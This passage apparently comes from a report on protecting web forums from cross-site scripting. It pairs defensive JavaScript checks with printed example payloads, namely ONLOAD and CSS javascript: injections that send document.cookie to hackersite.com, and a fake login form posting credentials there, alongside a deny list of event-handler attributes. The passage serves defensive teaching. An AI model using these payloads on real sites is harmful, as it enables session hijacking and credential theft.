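A check against Table 5.2 can be sketched as below. `hasAllowedExtension` is hypothetical and encodes only a few rows of the table; tag/attribute combinations that are not encoded are rejected (default deny). The query string and fragment are ignored, so that a URL such as evil.js?.jpg is judged by its real path.

```javascript
// Hypothetical hasAllowedExtension(): a partial encoding of Table 5.2,
// keyed by "tag:attribute".
const IMAGE_EXTS = [".jpg", ".jpeg", ".png", ".xbm", ".gif", ".bmp"];
const ALLOWED_EXTENSIONS = {
  "img:src": IMAGE_EXTS,
  "a:href": [".htm", ".html", ".asp", ".jsp", ".php", ".aspx", ".swf", ".rb", ".pl", ".cgi"],
  "embed:src": [".pdf", ".doc", ".wav"],
  "applet:code": [".class"],
  "script:src": [], // never allowed
};

function hasAllowedExtension(tag, attr, url) {
  const allowed = ALLOWED_EXTENSIONS[`${tag}:${attr}`.toLowerCase()];
  if (!allowed) return false; // combination not encoded: rejected
  const path = url.split(/[?#]/)[0]; // drop query string and fragment
  const lastSegment = path.substring(path.lastIndexOf("/") + 1);
  const dot = lastSegment.lastIndexOf(".");
  if (dot === -1) return false; // no extension at all
  return allowed.includes(lastSegment.substring(dot).toLowerCase());
}

console.log(hasAllowedExtension("img", "src", "http://example.com/pics/cat.jpg"));     // true
console.log(hasAllowedExtension("img", "src", "javascript:alert(document.cookie);")); // false
```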
The second category is the set of attributes that allow users to insert script directly. Allowing users to insert script directly is like leaving a bank open 24 hours, which makes it easy for a thief to rob it. But just as banks keep their security systems alert to protect their customers' wealth from thieves, web administrators should maintain security systems that safeguard novice users. To understand how attributes of this type can be malicious, consider the example below, which opens a new window every time the page is loaded and posts the novice user's session cookie to the attacker's site, enabling session hijacking.
<BODY ONLOAD="window.open('http://hackersite.com/info.pl?captcha=' + document.cookie)">
The attributes that belong to this category are: onblur, onclick, ondblclick, onfocus, onmousedown, onmousemove, onmouseout, onmouseover, onmouseup, onkeydown, onkeypress, onkeyup, onload, onunload, onabort, onchange, onreset, onselect, onsubmit.
The third and last category of attributes allows the user to set the style of his content. The examples given for the first and second categories are modified here to illustrate how attributes of the third category can be exploited.
<DIV STYLE="background-image: url(javascript:alert(document.cookie))">
<DIV STYLE="background-image: url(javascript:window.open('http://hackersite.com/info.pl?captcha='+document.cookie))">
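For the style category, one possible check is to pull every url(...) out of a style value and reject targets that use a scheme other than http or https. `findUnsafeCssUrls` is a hypothetical JavaScript sketch under that default-deny assumption. It does not decode CSS escapes or detect expression(), so it complements rather than replaces a full CSS parser.

```javascript
// Hypothetical findUnsafeCssUrls(): returns the url(...) targets in a style
// value whose scheme is anything other than http or https.
function findUnsafeCssUrls(style) {
  const unsafe = [];
  const urlRe = /url\(\s*(['"]?)(.*?)\1\s*\)/gi;
  let m;
  while ((m = urlRe.exec(style)) !== null) {
    // Whitespace inside the target is ignored before reading the scheme.
    const target = m[2].replace(/\s+/g, "").toLowerCase();
    const scheme = /^([a-z][a-z0-9+.-]*):/.exec(target);
    if (scheme && scheme[1] !== "http" && scheme[1] !== "https") {
      unsafe.push(m[2]);
    }
  }
  return unsafe;
}

console.log(findUnsafeCssUrls("background-image: url(javascript:alert(document.cookie))").length); // 1
console.log(findUnsafeCssUrls("background-image: url('http://example.com/bg.png')").length);       // 0
```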
To protect novice users from XSS, four tags must be considered in addition to all the attributes listed above, namely the <script>, <style>, <form> and <base> tags. The <script> tag can be used by an attacker to insert malicious script directly. The <base> tag is generally used to define the base path for relative references in the page; an attacker can use it to alter that path or redirect it to his own site. Just as the style attribute can be abused, the <style> tag can be used to insert malicious script. An example is shown below:
<STYLE>.test { background-image: url(javascript:window.open('http://hackersite.com/info.pl?captcha='+document.cookie)); }</STYLE>
In the above example, instead of a background-image URL, a malicious script is given, which on execution opens a new window and sends the user's session cookie to the hacker's site.
To protect users from the XSS-based phishing attack explained in Section 2.6.3, we must consider the inner content and the action attribute of the <form> tag. An illustration of how an attacker can use the inner content of a <form> tag is shown below:
<form action='http://hackersite.com/exec.cgi'>
<b>User Name: </b>
<input type='text' name='username' size=20> <br>
<b>Password: </b>
<input type='password' name='password' size=20>
<button type='submit'>Submit</button>
</form>
The example above creates an HTML form with two text boxes asking for a user name and password; on submission, it posts their contents to the hacker's site. If an attacker posts this message on a banking website's user forum, an innocent user visiting the page may log in through it, which may result in a huge loss for the user. Since the inner content of a <form> tag can have such a serious impact, it is always safer to strip off any content inside a <form> tag. Apart from the inner content of the <form> tag, the 'action' attribute can also be used by an attacker to steal the user's username and password. An attacker will post a message with a <form> tag and some malicious script that replaces the actual <form> tag with the inserted one. The result of such post is obvious that it